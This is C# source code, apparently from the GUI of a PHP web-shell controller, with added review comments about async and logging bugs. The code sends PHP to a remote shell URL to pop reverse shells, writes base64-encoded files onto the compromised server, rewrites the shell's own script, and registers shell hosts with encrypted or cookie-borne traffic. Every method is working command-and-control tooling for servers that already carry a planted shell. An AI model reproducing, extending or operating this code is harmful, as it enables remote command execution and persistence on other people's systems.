/// <summary>
/// Wraps <paramref name="shellCode"/> with <c>PhpBuilder.ExecuteSystemCode</c> (the
/// non-chankro path) and hands the resulting PHP to <c>WebRequestHelper.ExecuteRemotePHP</c>
/// for <c>ShellUrl</c>; the command is written to the shell log when logging is ticked.
/// </summary>
/// <param name="shellCode">
/// Command text passed to <c>PhpBuilder.ExecuteSystemCode</c> and, when
/// <c>checkBoxLogShellCode</c> is checked, recorded verbatim in the shell log.
/// </param>
private async Task PopReverseShell(string shellCode)
{
    string wrappedPhp = PhpBuilder.ExecuteSystemCode(shellCode, false);

    // NOTE(review): the lambda returns the ConfigureAwait(false) awaitable, not a Task, so
    // this await appears to complete once the request has been started rather than when it
    // finishes; an exception raised later inside ExecuteRemotePHP would not surface here.
    // Confirm that this fire-and-forget behaviour is intended.
    var dispatch = Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, wrappedPhp, true).ConfigureAwait(false));
    await dispatch;

    if (!checkBoxLogShellCode.Checked)
    {
        return;
    }

    // NOTE(review): the entry says "chankro" although this method is the non-chankro path,
    // and it is written whether or not the request succeeded; anyone reading the log as an
    // activity record should treat the label as unreliable until the wording is confirmed.
    LogHelper.AddShellLog(ShellUrl, $"Attempted to pop chankro reverse shell with [ {shellCode} ] ", LogHelper.LOG_LEVEL.REQUESTED);
}
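/// <summary>
/// Upload button handler: base64-encodes the selected content, wraps it in a PHP
/// file-write statement built by <c>PhpBuilder</c>, sends it to <c>ShellUrl</c> through
/// <c>WebRequestHelper.ExecuteRemotePHP</c> and then closes the form.
/// </summary>
/// <remarks>
/// The browse button, upload button and text box are disabled while the handler runs and
/// are restored on every exit path. Previously the "nothing to upload" paths re-enabled
/// only the upload button, leaving the text box and browse button locked so the input
/// could not be corrected.
/// </remarks>
/// <param name="sender">Control that raised the click event (unused).</param>
/// <param name="e">Event data (unused).</param>
private async void btnUpload_Click(object sender, EventArgs e)
{
    string phpCode;

    btnBrowse.Enabled = false;
    btnUpload.Enabled = false;
    richTextBox1.Enabled = false;

    try
    {
        if (EditingSelf)
        {
            // Self-edit mode only takes content from the text box.
            if (string.IsNullOrEmpty(richTextBox1.Text))
            {
                LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data to self...", LogHelper.LOG_LEVEL.INFO);
                return;
            }

            string encodedScript = Helper.EncodeBase64ToString(richTextBox1.Text);
            phpCode = PhpBuilder.WriteFileVar(PhpBuilder.phpServerScriptFileName, encodedScript);
        }
        else
        {
            // A local file, when one was chosen, takes precedence over the text box.
            string encodedContent;
            if (!string.IsNullOrEmpty(LocalFileLocation))
            {
                encodedContent = Convert.ToBase64String(File.ReadAllBytes(LocalFileLocation));
            }
            else if (!string.IsNullOrEmpty(richTextBox1.Text))
            {
                encodedContent = Helper.EncodeBase64ToString(richTextBox1.Text);
            }
            else
            {
                LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data...", LogHelper.LOG_LEVEL.INFO);
                return;
            }

            string remoteFileLocation = ServerPath + "/" + txtBoxFileName.Text;
            phpCode = PhpBuilder.WriteFile(remoteFileLocation, encodedContent);
        }

        // NOTE(review): no shell-log entry is written in this method for an upload that is
        // actually sent; only the empty-input cases are logged here.
        await WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode);
    }
    finally
    {
        // Runs for the early returns, the success path and any exception alike.
        btnUpload.Enabled = true;
        btnBrowse.Enabled = true;
        richTextBox1.Enabled = true;
    }

    // Reached only after the request was awaited; the early returns leave the form open.
    this.Close();
}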
/// <summary>
/// Passes the PHP for a chankro shell to <c>WebRequestHelper.ExecuteRemotePHP</c> for
/// <c>ShellUrl</c>, invoking it from a <c>Task.Run</c> work item.
/// </summary>
/// <param name="phpCode">PHP source forwarded unchanged to <c>ExecuteRemotePHP</c>.</param>
private async Task PopChankroShell(string phpCode)
{
    // NOTE(review): the lambda returns the ConfigureAwait(false) awaitable, not a Task, so
    // this await appears to complete once the request has been started rather than when it
    // finishes; an exception raised later inside ExecuteRemotePHP would not surface here.
    // Confirm that this fire-and-forget behaviour is intended.
    var dispatch = Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode, true).ConfigureAwait(false));
    await dispatch;
}
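/// <summary>
/// Add-host button handler: validates the dialog's encryption settings, registers a
/// <c>ShellInfo</c> for the entered URL in <c>BantamMain.Shells</c>, sends a test request
/// to that URL and, when the (optionally decrypted) response is exactly <c>"1"</c>, calls
/// <c>BantamMain.Instance.InitializeShellData</c> and closes the dialog.
/// </summary>
/// <remarks>
/// The new <c>ShellInfo</c> is configured through one local reference instead of repeated
/// <c>BantamMain.Shells[shellURL]</c> indexer lookups, each of which could throw
/// <c>KeyNotFoundException</c> if the entry were removed from the shared dictionary while
/// the handler was still filling it in. If the test request fails, the entry is removed
/// again; an entry that previously existed for the same URL is not restored.
/// </remarks>
/// <param name="sender">Control that raised the click event (unused).</param>
/// <param name="e">Event data (unused).</param>
private async void btnAddShell_Click(object sender, EventArgs e)
{
    string shellURL = txtBoxShellUrl.Text;
    if (string.IsNullOrEmpty(shellURL))
    {
        return;
    }

    bool encryptRequest = checkBoxEncryptRequest.Checked;
    bool sendIvInRequest = checkBoxSendIVInRequest.Checked;

    if (encryptRequest)
    {
        // Lengths are checked in characters: 32 for the key, 16 for a user-supplied IV.
        if (textBoxEncrpytionKey.Text.Length != 32)
        {
            labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again.";
            return;
        }

        // An IV is only required from the user when it is not sent with the request.
        if (!sendIvInRequest)
        {
            string encryptionIV = textBoxEncrpytionIV.Text;
            if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16)
            {
                labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again.";
                return;
            }
        }
    }

    // Remove an existing entry for this URL (GUI first, then the dictionary).
    if (BantamMain.Shells.ContainsKey(shellURL))
    {
        BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL);

        if (!BantamMain.Shells.TryRemove(shellURL, out _))
        {
            LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
            return;
        }
    }

    // Register the new entry, then configure it through the local reference.
    ShellInfo shellInfo = new ShellInfo();
    if (!BantamMain.Shells.TryAdd(shellURL, shellInfo))
    {
        LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
        return;
    }

    shellInfo.RequestArgName = txtBoxArgName.Text;

    if (comboBoxVarType.Text == "cookie")
    {
        shellInfo.SendDataViaCookie = true;
    }

    if (checkBoxResponseEncryption.Checked)
    {
        shellInfo.ResponseEncryption = true;
        shellInfo.ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex;
    }
    else
    {
        shellInfo.ResponseEncryption = false;
    }

    shellInfo.GzipRequestData = checkBoxGZipRequest.Checked;

    // Captured before the await so the test below uses the values configured here.
    bool encryptResponse = shellInfo.ResponseEncryption;
    int responseEncryptionMode = shellInfo.ResponseEncryptionMode;

    if (encryptRequest)
    {
        shellInfo.RequestEncryption = true;
        shellInfo.RequestEncryptionKey = textBoxEncrpytionKey.Text;

        if (sendIvInRequest)
        {
            shellInfo.SendRequestEncryptionIV = true;
            shellInfo.RequestEncryptionIV = string.Empty;
            shellInfo.RequestEncryptionIVRequestVarName = textBoxIVVarName.Text;
        }
        else
        {
            shellInfo.RequestEncryptionIV = textBoxEncrpytionIV.Text;
            shellInfo.RequestEncryptionIVRequestVarName = string.Empty;
        }
    }
    else
    {
        shellInfo.RequestEncryption = false;
        shellInfo.RequestEncryptionIVRequestVarName = string.Empty;
        shellInfo.RequestEncryptionIV = string.Empty;
        shellInfo.RequestEncryptionKey = string.Empty;
    }

    // Shared failure path: report the problem and drop the entry that was just added.
    void RejectShell()
    {
        labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
        BantamMain.Shells.TryRemove(shellURL, out _);
    }

    // Connectivity test: the remote side is expected to answer with the literal "1".
    string phpCode = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse);
    ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode);

    if (string.IsNullOrEmpty(response.Result))
    {
        RejectShell();
        return;
    }

    string result = response.Result;
    if (encryptResponse)
    {
        result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, responseEncryptionMode);
    }

    // A null or empty result is also rejected here, since it cannot equal "1".
    if (result != "1")
    {
        RejectShell();
        return;
    }

    BantamMain.Instance.InitializeShellData(shellURL);
    this.Close();
}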